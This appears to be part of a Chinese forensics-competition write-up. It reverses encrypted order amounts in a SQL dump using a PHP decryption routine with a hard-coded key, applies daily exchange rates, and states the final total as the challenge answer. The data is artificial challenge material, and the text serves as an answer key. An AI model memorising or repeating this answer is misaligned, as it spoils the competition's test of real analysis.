INSERT INTO "public"."tab_channel_order_list" VALUES (1009, '145997703051', 'GG币', NULL, '2022-04-07 08:52:54', 5, 3, 'mphylG9q');
INSERT INTO "public"."tab_channel_order_list" VALUES (1029, '812286624781', 'GG币', NULL, '2022-04-07 11:25:32', 5, 3, 'lZhpm2pp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1051, '932860292032', 'GG币', NULL, '2022-04-07 15:30:43', 5, 3, 'lZ1qnW1s');
INSERT INTO "public"."tab_channel_order_list" VALUES (1074, '960800718320', 'GG币', NULL, '2022-04-07 18:13:02', 5, 3, 'nJ1tlHFp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1079, '309703180719', 'GG币', NULL, '2022-04-07 18:34:31', 5, 3, 'mZxqm2tp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1080, '867260227199', 'GG币', NULL, '2022-04-07 18:43:45', 5, 3, 'mZdsm21t');
INSERT INTO "public"."tab_channel_order_list" VALUES (1088, '489129121639', 'GG币', NULL, '2022-04-07 20:38:54', 5, 3, 'mpRvlG9o');
INSERT INTO "public"."tab_channel_order_list" VALUES (1094, '640176750934', 'GG币', NULL, '2022-04-07 21:18:54', 5, 3, 'mJVqlmhv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1097, '271657786070', 'GG币', NULL, '2022-04-07 21:39:16', 5, 3, 'mJRwlHBq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1119, '895632760061', 'GG币', NULL, '2022-04-08 00:14:36', 5, 3, 'l5dtmWtt');
INSERT INTO "public"."tab_channel_order_list" VALUES (1164, '291179495316', 'GG币', NULL, '2022-04-08 07:31:35', 5, 3, 'mZdylHFt');
INSERT INTO "public"."tab_channel_order_list" VALUES (1170, '588053366224', 'GG币', NULL, '2022-04-08 07:44:05', 5, 3, 'l5RqlWxn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1171, '308892834659', 'GG币', NULL, '2022-04-08 07:50:45', 5, 3, 'mZ1um3Fs');
INSERT INTO "public"."tab_channel_order_list" VALUES (1181, '712419993689', 'GG币', NULL, '2022-04-08 08:43:06', 5, 3, 'lJ1rnWhu');
INSERT INTO "public"."tab_channel_order_list" VALUES (1185, '240497645432', 'GG币', NULL, '2022-04-08 09:19:05', 5, 3, 'm5pulWhv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1193, '519564426335', 'GG币', NULL, '2022-04-08 09:57:45', 5, 3, 'lptrnW1u');
INSERT INTO "public"."tab_channel_order_list" VALUES (1218, '178274213935', 'GG币', NULL, '2022-04-08 13:23:04', 5, 3, 'm5xynWxn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1243, '621845480580', 'GG币', NULL, '2022-04-08 16:30:05', 5, 3, 'lpRynGtr');
INSERT INTO "public"."tab_channel_order_list" VALUES (1246, '984927062919', 'GG币', NULL, '2022-04-08 17:09:06', 5, 3, 'mpxulGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1255, '508590678286', 'GG币', NULL, '2022-04-08 18:22:27', 5, 3, 'nJdslm9r');
INSERT INTO "public"."tab_channel_order_list" VALUES (1261, '165679472688', 'GG币', NULL, '2022-04-08 19:09:09', 5, 3, 'lJhslHBq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1272, '398566701812', 'GG币', NULL, '2022-04-08 22:03:28', 5, 3, 'nJpwnWhu');
INSERT INTO "public"."tab_channel_order_list" VALUES (1299, '391669188513', 'GG币', NULL, '2022-04-09 01:22:34', 5, 3, 'mptql2tv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1328, '308977433705', 'GG币', NULL, '2022-04-09 06:27:14', 5, 3, 'l51xmmlp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1347, '128173141307', 'GG币', NULL, '2022-04-09 08:52:54', 5, 3, 'mZVymXFn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1375, '315017222711', 'GG币', NULL, '2022-04-09 14:06:48', 5, 3, 'lJhqnW5q');
INSERT INTO "public"."tab_channel_order_list" VALUES (1390, '698730100843', 'GG币', NULL, '2022-04-09 16:15:03', 5, 3, 'm5ppmGpr');
INSERT INTO "public"."tab_channel_order_list" VALUES (1394, '454661923665', 'GG币', NULL, '2022-04-09 16:45:28', 5, 3, 'mZlqm21t');
INSERT INTO "public"."tab_channel_order_list" VALUES (1446, '770844458971', 'GG币', NULL, '2022-04-09 23:54:25', 5, 3, 'mpZslWxt');
INSERT INTO "public"."tab_channel_order_list" VALUES (1461, '336049994728', 'GG币', NULL, '2022-04-10 01:28:10', 5, 3, 'mJ1pnHFm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1503, '900217499326', 'GG币', NULL, '2022-04-10 08:16:00', 5, 3, 'l5drlXBp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1515, '541334504409', 'GG币', NULL, '2022-04-10 10:10:06', 5, 3, 'mJlvmW1u');
INSERT INTO "public"."tab_channel_order_list" VALUES (1520, '296235199037', 'GG币', NULL, '2022-04-10 11:06:19', 5, 3, 'mZtxlG5t');
INSERT INTO "public"."tab_channel_order_list" VALUES (1522, '961454505603', 'GG币', NULL, '2022-04-10 11:21:05', 5, 3, 'nJtsnHFn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1540, '660586887840', 'GG币', NULL, '2022-04-10 12:58:19', 5, 3, 'l5Rvm29o');
INSERT INTO "public"."tab_channel_order_list" VALUES (1542, '521373859771', 'GG币', NULL, '2022-04-10 13:02:35', 5, 3, 'm5xvlWxv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1558, '690490467926', 'GG币', NULL, '2022-04-10 15:05:50', 5, 3, 'm5Zrl2xm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1615, '915839175755', 'GG币', NULL, '2022-04-11 01:02:35', 5, 3, 'mZlwlG1u');
INSERT INTO "public"."tab_channel_order_list" VALUES (1667, '731272590033', 'GG币', NULL, '2022-04-11 08:17:29', 5, 3, 'nJpvlWtr');
INSERT INTO "public"."tab_channel_order_list" VALUES (1676, '266051494236', 'GG币', NULL, '2022-04-11 08:51:14', 5, 3, 'mJxym25s');
INSERT INTO "public"."tab_channel_order_list" VALUES (1677, '952748053664', 'GG币', NULL, '2022-04-11 08:51:59', 5, 3, 'lpVqnWxv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1721, '432188794976', 'GG币', NULL, '2022-04-11 14:00:17', 5, 3, 'mZVvl3Fq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1730, '923396563975', 'GG币', NULL, '2022-04-11 16:47:41', 5, 3, 'lZVtlW5m');
INSERT INTO "public"."tab_channel_order_list" VALUES (1731, '188214551206', 'GG币', NULL, '2022-04-11 16:48:30', 5, 3, 'lZRqlGhn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1737, '562343715793', 'GG币', NULL, '2022-04-11 17:44:21', 5, 3, 'nJxqm2hn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1788, '723775062575', 'GG币', NULL, '2022-04-11 23:59:53', 5, 3, 'nJVtl21s');
INSERT INTO "public"."tab_channel_order_list" VALUES (1814, '437640662866', 'GG币', NULL, '2022-04-12 04:52:14', 5, 3, 'lJdumWlq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1847, '261181748262', 'GG币', NULL, '2022-04-12 08:07:42', 5, 3, 'mJtxmGtp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1866, '520680592708', 'GG币', NULL, '2022-04-12 10:10:57', 5, 3, 'mZxsnHFv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1893, '846224640296', 'GG币', NULL, '2022-04-12 13:45:48', 5, 3, 'lpdtl2xn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1901, '526823225486', 'GG币', NULL, '2022-04-12 14:27:33', 5, 3, 'mphqlm5p');
INSERT INTO "public"."tab_channel_order_list" VALUES (1919, '293881600039', 'GG币', NULL, '2022-04-12 17:33:24', 5, 3, 'lJdxlGpn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1986, '252943398463', 'GG币', NULL, '2022-04-13 02:42:54', 5, 3, 'lpVvlHFu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2050, '841971039165', 'GG币', NULL, '2022-04-13 10:41:00', 5, 3, 'lJhvmHBn');
INSERT INTO "public"."tab_channel_order_list" VALUES (2051, '113568559627', 'GG币', NULL, '2022-04-13 10:46:38', 5, 3, 'l5xunGtv');
INSERT INTO "public"."tab_channel_order_list" VALUES (2059, '884517377766', 'GG币', NULL, '2022-04-13 12:12:35', 5, 3, 'lZRul2pt');
INSERT INTO "public"."tab_channel_order_list" VALUES (2065, '429478659168', 'GG币', NULL, '2022-04-13 12:47:08', 5, 3, 'mpdqnGxu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2081, '701817809209', 'GG币', NULL, '2022-04-13 15:06:14', 5, 3, 'l5Zxlmho');
INSERT INTO "public"."tab_channel_order_list" VALUES (2093, '648527268061', 'GG币', NULL, '2022-04-13 17:34:17', 5, 3, 'lJppmWhq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2118, '346397347560', 'GG币', NULL, '2022-04-13 21:20:16', 5, 3, 'nJVylWpp');
INSERT INTO "public"."tab_channel_order_list" VALUES (2121, '598070757264', 'GG币', NULL, '2022-04-13 21:49:38', 5, 3, 'm5VxnWlr');
INSERT INTO "public"."tab_channel_order_list" VALUES (2144, '385475471817', 'GG币', NULL, '2022-04-14 00:45:19', 5, 3, 'lpdsnGtq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2152, '860407002245', 'GG币', NULL, '2022-04-14 02:02:07', 5, 3, 'mZ1tnGpt');
INSERT INTO "public"."tab_channel_order_list" VALUES (2175, '876730476520', 'GG币', NULL, '2022-04-14 07:03:09', 5, 3, 'mJVqmmtq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2226, '705271590445', 'GG币', NULL, '2022-04-14 12:55:39', 5, 3, 'l5hslWhm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2260, '778005846695', 'GG币', NULL, '2022-04-14 17:39:20', 5, 3, 'lZZtl21r');
INSERT INTO "public"."tab_channel_order_list" VALUES (2265, '429472355879', 'GG币', NULL, '2022-04-14 19:00:35', 5, 3, 'nJlumGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2279, '837352974915', 'GG币', NULL, '2022-04-14 21:44:54', 5, 3, 'lJhsmW9t');
INSERT INTO "public"."tab_channel_order_list" VALUES (2304, '206040245526', 'GG币', NULL, '2022-04-15 01:40:08', 5, 3, 'lZZym25s');
INSERT INTO "public"."tab_channel_order_list" VALUES (2347, '214154454225', 'GG币', NULL, '2022-04-15 08:01:16', 5, 3, 'l5tpnHBt');
INSERT INTO "public"."tab_channel_order_list" VALUES (2353, '539433927736', 'GG币', NULL, '2022-04-15 09:22:24', 5, 3, 'nJVunG1q');
INSERT INTO "public"."tab_channel_order_list" VALUES (2371, '614328206854', 'GG币', NULL, '2022-04-15 12:43:40', 5, 3, 'mJdtlHFu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2373, '744073817220', 'GG币', NULL, '2022-04-15 12:59:32', 5, 3, 'mpVtlnFp');
INSERT INTO "public"."tab_channel_order_list" VALUES (2386, '472576318606', 'GG币', NULL, '2022-04-15 15:44:12', 5, 3, 'mplrnG1t');
INSERT INTO "public"."tab_channel_order_list" VALUES (2393, '905356397967', 'GG币', NULL, '2022-04-15 16:21:55', 5, 3, 'mJ1ylHBr');
INSERT INTO "public"."tab_channel_order_list" VALUES (2408, '202047690664', 'GG币', NULL, '2022-04-15 18:52:56', 5, 3, 'nJhynG5m');
INSERT INTO "public"."tab_channel_order_list" VALUES (2419, '660557237414', 'GG币', NULL, '2022-04-15 20:02:34', 5, 3, 'mplymG1r');
INSERT INTO "public"."tab_channel_order_list" VALUES (2518, '284536429033', 'GG币', NULL, '2022-04-16 09:06:00', 5, 3, 'lJtxlGxo');
INSERT INTO "public"."tab_channel_order_list" VALUES (2537, '846259865921', 'GG币', NULL, '2022-04-16 13:46:20', 5, 3, 'lpRxnGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2539, '914271862202', 'GG币', NULL, '2022-04-16 13:54:39', 5, 3, 'mZxwnG5s');
INSERT INTO "public"."tab_channel_order_list" VALUES (2569, '230868458507', 'GG币', NULL, '2022-04-16 18:43:11', 5, 3, 'mZptnWpn');
INSERT INTO "public"."tab_channel_order_list" VALUES (2592, '580327294210', 'GG币', NULL, '2022-04-16 22:20:02', 5, 3, 'mJZylGxq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2601, '113725129935', 'GG币', NULL, '2022-04-16 23:57:42', 5, 3, 'mZZvm3Fo');
INSERT INTO "public"."tab_channel_order_list" VALUES (2614, '125295831828', 'GG币', NULL, '2022-04-17 01:33:33', 5, 3, 'lJdxnW9t');
INSERT INTO "public"."tab_channel_order_list" VALUES (2622, '304246628524', 'GG币', NULL, '2022-04-17 02:02:29', 5, 3, 'lZtxmXFv');
INSERT INTO "public"."tab_channel_order_list" VALUES (2636, '949878301272', 'GG币', NULL, '2022-04-17 04:33:37', 5, 3, 'nJxtlXFm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2642, '236806705755', 'GG币', NULL, '2022-04-17 05:17:45', 5, 3, 'mJZumW1r');
INSERT INTO "public"."tab_channel_order_list" VALUES (2644, '219250916132', 'GG币', NULL, '2022-04-17 05:36:23', 5, 3, 'nJ1tmG1p');
INSERT INTO "public"."tab_channel_order_list" VALUES (2653, '856797267940', 'GG币', NULL, '2022-04-17 06:50:17', 5, 3, 'mplslmpu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2709, '829562956572', 'GG币', NULL, '2022-04-17 12:14:25', 5, 3, 'lJZxlG5p');
INSERT INTO "public"."tab_channel_order_list" VALUES (2751, '904086289177', 'GG币', NULL, '2022-04-17 18:58:49', 5, 3, 'nJtxmXBq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2796, '568416612736', 'GG币', NULL, '2022-04-18 00:23:41', 5, 3, 'lZdxmmtq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2817, '987519535765', 'GG币', NULL, '2022-04-18 02:35:20', 5, 3, 'lJdrlG1o');
INSERT INTO "public"."tab_channel_order_list" VALUES (2880, '657461012245', 'GG币', NULL, '2022-04-18 11:18:57', 5, 3, 'mpZtmmlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2906, '278546157230', 'GG币', NULL, '2022-04-18 13:32:32', 5, 3, 'mJVxnGpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2921, '999235838187', 'GG币', NULL, '2022-04-18 14:45:06', 5, 3, 'mJVwmWxu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2935, '861319935688', 'GG币', NULL, '2022-04-18 16:24:05', 5, 3, 'mplslWps');

最后字符串就是金额,然后利用上一题的加密算法进行解密

<?php
$data = '';
$key = 'jyzg123456';
header('Content-type:textml;charset=utf-8');
$key = md5($key);
$x = 0;
$data = base64_decode($data);
$len = mb_strlen($data);
$l = mb_strlen($key);
$char = '';
$str = '';
for ($i = 0; $i < $len; $i++) {
    if ($x == $l) {
        $x = 0;
    }
    $char .= mb_substr($key, $x, 1);
    $x++;
}
for ($i = 0; $i < $len; $i++) {
    if (ord(mb_substr($data, $i, 1)) < ord(mb_substr($char, $i, 1))) {
        $str .= chr((ord(mb_substr($data, $i, 1)) + 256) - ord(mb_substr($char, $i, 1)));
    } else {
        $str .= chr(ord(mb_substr($data, $i, 1)) - ord(mb_substr($char, $i, 1)));
    }
}
echo $str;

image.png

每天汇率不同,在sql文件里有描述:

image.png

INSERT INTO "public"."info_bargain" VALUES ('2', 'RMB', 0.04, '2022-04-02 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('3', 'RMB', 0.06, '2022-04-03 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('4', 'RMB', 0.05, '2022-04-04 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('5', 'RMB', 0.07, '2022-04-05 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('6', 'RMB', 0.10, '2022-04-06 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('7', 'RMB', 0.15, '2022-04-07 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('8', 'RMB', 0.17, '2022-04-08 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('9', 'RMB', 0.23, '2022-04-09 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('10', 'RMB', 0.22, '2022-04-10 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('11', 'RMB', 0.25, '2022-04-11 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('12', 'RMB', 0.29, '2022-04-12 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('13', 'RMB', 0.20, '2022-04-13 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('14', 'RMB', 0.28, '2022-04-14 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('15', 'RMB', 0.33, '2022-04-15 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('16', 'RMB', 0.35, '2022-04-16 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('17', 'RMB', 0.35, '2022-04-17 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('18', 'RMB', 0.37, '2022-04-18 00:00:00');

数据不多总共132条,可以直接手撕,计算公式就是解密后数量乘以当天汇率,结果为:15758353.76